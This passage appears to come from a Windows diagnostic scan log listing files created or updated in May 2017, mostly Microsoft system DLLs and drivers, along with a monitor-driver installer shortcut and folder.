2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk
2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver
2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini
2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG
2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
